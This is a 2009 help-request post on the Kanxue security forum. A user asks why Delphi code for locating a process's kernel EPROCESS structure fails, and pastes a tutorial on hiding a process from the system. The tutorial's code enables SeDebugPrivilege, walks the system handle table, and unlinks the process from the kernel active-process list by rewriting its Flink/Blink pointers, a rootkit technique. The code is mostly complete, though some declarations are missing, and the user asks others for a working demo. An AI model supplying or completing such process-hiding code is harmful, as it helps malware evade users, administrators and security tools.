首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 编程技术
    3. 发新帖
[求助]delphi get EProcess 出错?
发表于: 2009-5-30 15:50 5400

[求助]delphi get EProcess 出错?

oopww 活跃值
2009-5-30 15:50
5400
function GetEProcess(PID: Cardinal): Cardinal;
var
HandleTable : pHandleInformation;
i : DWord;
hProcess: THandle;
begin
Result := 0;
hProcess := OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, PID);
HandleTable := GetSystemHandleInfo;
CPID := GetCurrentProcessId;
for i := 0 to HandleTable.NumberOfHandles -1 do
    if  (HandleTable.Handles[i].ProcessId = PID)and (HandleTable.Handles[i].Handle = hProcess) then
         begin
          Result := (Cardinal(HandleTable.Handles[i].pObject));//要得到的虚拟地址         
        Break;
         end;
//SetLength(HandleTable.Handles, 0);
FreeMem( HandleTable );
CloseHandle(hProcess);
end;

下面是函数GetSystemHandleInfo:

function GetSystemHandleInfo:PHandleInformation;
var
n : DWORD;
rv :NTSTATUS;
rs,res : DWORD;
pHandleInfo : PHandleInformation;
begin
Result := nil;
n := $1000;
pHandleInfo := AllocMem (n);
repeat
    rs := SizeOf (THandleInformation) + SizeOf (TSystemHandleInformation) * (n - 1);//遍历
    ReallocMem (pHandleInfo, rs);
    rv := ZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, rs, @res);
    n := n * 2;
until rv <> STATUS_INFO_LENGTH_MISMATCH;
if rv <> 0 then
begin
    ReallocMem (pHandleInfo, 0);
end;
Result := pHandleInfo;
end;

相关的定义部分:
const
STATUS_INFO_LENGTH_MISMATCH = $C0000004;
type
  NTSTATUS = LongInt;

type
_SYSTEM_INFORMATION_CLASS =
  (
  SystemHandleInformation = 16
  );
SYSTEM_INFORMATION_CLASS = _SYSTEM_INFORMATION_CLASS;

type
    _SystemHandleInformation = packed record
   ProcessID          :ULONG ;    //进程的标识ID
   ObjectTypeNumber    :UCHAR ;    //对象类型
   Flags          :UCHAR ;    //0x01 =  PROTECT_FROM_CLOSE,0x02 = INHERIT
   Handle          :SHORT ;    //对象句柄的数值
   pObject          :pointer  ;    //对象句柄所指的内核对象地址
   GrantedAccess       :ACCESS_MASK ;  //创建句柄时所准许的对象的访问权
end;
    TSystemHandleInformation = _SystemHandleInformation;
    SYSTEM_HANDLE_INFORMATION = _SystemHandleInformation;
    PSystemHandleInformation = ^_SystemHandleInformation;
    TZWQUERYSYSTEMINFORMATION = function(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation:
Pointer; SystemInformationLength: ULONG; ReturnLength: PULONG): NTSTATUS; stdcall;

type
THandleInformation = packed record
    NumberOfHandles : ULONG;
    Handles : array[0..0] of TSystemHandleInformation
end;
PHandleInformation =^THandleInformation;
var
  ZwQuerySystemInformation: TZWQUERYSYSTEMINFORMATION = nil;
////////////////////////////////////////////////////////////////////////////////////////////////////
以下是我再网上找到的修改EProcess隐藏进程,

请牛牛写个demo吧,那样很直观!
///////////////////////////////////////////////////////////////////////////////////////////////////
新人,技术很烂,还望大家多多包涵
双向链表隐藏进程,删除核心态APL双向链表,首先要获得EProcess虚拟地址。
function GetSystemHandleInfo:PHandleInformation;
var
n : DWORD;
rv :NTSTATUS;
rs,res : DWORD;
pHandleInfo : PHandleInformation;
begin
Result := nil;
n := $1000;
pHandleInfo := AllocMem (n);
repeat
rs := SizeOf (THandleInformation) + SizeOf (TSystemHandleInformation) * (n - 1);//遍历
ReallocMem (pHandleInfo, rs);
rv := ZwQuerySystemInformation (SystemHandleInformation, pHandleInfo, rs, @res);
n := n * 2;
until rv <> STATUS_INFO_LENGTH_MISMATCH;
if rv <> 0 then
begin
ReallocMem (pHandleInfo, 0);
RaiseLastOSError
end;
Result := pHandleInfo;
end;
先用OpenProcess来获得我们想要隐藏的目标进程的句柄,然后可以使用ZwQuerySystemInformation的SystemHandleInformation参数,使用ZwQuerySystemInformation函数获取所有核心句柄表,线性搜索到进程句柄,其指向的内核对象就是EPROCESS。
直接获得EProcess的代码如下:
function GetEProcess(PID: Cardinal): Cardinal;
var
HandleTable : pHandleInformation;
i : DWord;
hProcess, CPID : THandle;
begin
Result := 0;
hProcess := OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, PID);
HandleTable := GetSystemHandleInfo;
CPID := GetCurrentProcessId;
for i := 0 to HandleTable.NumberOfHandles -1 do
if (HandleTable.Handles[i].ProcessId = CPID) and
(HandleTable.Handles[i].Handle = hProcess) then
begin
Result := (Cardinal(HandleTable.Handles[i].Object_ )); //这里就是 EProcess的虚拟地址
Break;
end;
SetLength(HandleTable.Handles, 0);
FreeMem( HandleTable );
CloseHandle(hProcess);
end;
不要忘记了提权,SeDebug权限很好很强大,虽然是每个内核程序的必修课……
function EnableDebugPrivilege: Boolean;
function EnablePrivilege(hToken: Cardinal; PrivName: string; bEnable: Boolean): Boolean;
var
TP: TOKEN_PRIVILEGES;
Dummy: Cardinal;
begin
TP.PrivilegeCount := 1;
LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
if bEnable then
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else TP.Privileges[0].Attributes := 0;
AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);
Result := GetLastError = ERROR_SUCCESS;
end;
var
hToken: Cardinal;
begin
OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
result:=EnablePrivilege(hToken, ‘SeDebugPrivilege', True);
CloseHandle(hToken);
end;

最后把那个Blink和Flink指针指向的地址读出来,一般情况下是EProcess+$88和EProcess+$8C,然后删核心态的APL
function HideProcess: boolean;
var
EProcess : DWord;
FLink, BLink: Cardinal;
begin
Result := false;
EProcess := GetEprocessFromPid(GetCurrentProcessId);
//showmessage(IntToHex(EProcess,1));
if EProcess < 1 then Exit;
Hide_EProcess := EProcess;
if not ReadVirtualMemory(EProcess+$88, @FLink, 4) then Exit;//Flink指针指向地址
if not ReadVirtualMemory(EProcess+$8C, @BLink, 4) then Exit;//Blink指针指向地址
if (FLink<$80000000)or(BLink<$80000000) then Exit;
Old_FLink_Addr := BLink;
Old_BLink_Addr := FLink+4;
ReadVirtualMemory(FLink+4, @Old_BLink, 4);
ReadVirtualMemory(BLink, @Old_FLink, 4);
if not WriteVirtualMemory(FLink+4, @BLink, 4) then Exit;
if not WriteVirtualMemory(BLink, @FLink, 4) then Exit;
Result := true;
end;
////////////////////////////////////////////////////////////////////////////////////////////////////////
有很多的申明没有。新手嘛,找不到!
谢谢。。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//